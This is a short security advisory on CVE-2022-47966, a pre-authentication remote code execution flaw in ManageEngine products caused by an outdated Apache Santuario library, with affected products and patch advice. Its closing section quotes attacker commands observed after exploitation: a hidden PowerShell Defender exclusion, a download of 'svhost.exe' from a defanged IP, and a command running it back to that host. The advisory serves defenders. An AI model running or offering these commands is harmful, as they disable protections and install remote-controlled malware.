A vulnerability was found in two dozen ManageEngine products which is currently being exploited in the wild. CVE-2022-47966 is a pre-authentication remote code execution (RCE) vulnerability stemming from an outdated version of the Apache Santuario library.
CVE-2022-47966 impacts several popular products used by large organizations, including ServiceDesk Plus, ADSelfService Plus, Active Directory 360, Access Manager Plus, and others. Between October and November 2022, patches were released but the timing of the fixed version releases varies by product.
During testing, researchers from Rapid7 found that some products may be more exploitable than others. For example, the researchers stated that ServiceDesk Plus is easy to exploit with the proof-of-concept code (PoC), but successful attackers would need to obtain two additional pieces of information to modify the PoC.
As previously stated, an obsolete version of the Apache Santuario library, which implements security requirements for XML, was the cause of the vulnerability. A SAML request with an incorrect signature can be used to exploit the issue if SAML single sign-on is currently or has previously been enabled on those products.
Due to the popularity of ManageEngine solutions, a vulnerability such as CVE-2022-47966 puts organizations at serious risk by giving attackers initial access and the potential to move laterally using privileged credentials. Avertium recommends that all organizations using the affected products listed in ManageEngine’s advisory, patch immediately.
Please read ManageEngine’s advisory for updated product and version information, as well as patch guidance.
Post Exploitation MITRE ATT&CK Techniques (observed by Rapid7)
powershell -windowstyle hidden set-mppreference –
set-mppreference -exclusionpath c:\users\public
invoke-webrequest -uri http://111.68.7[.]122:8081/svhost.exe
c:\users\public\svhost.exe client 111.68.7[.]122:8080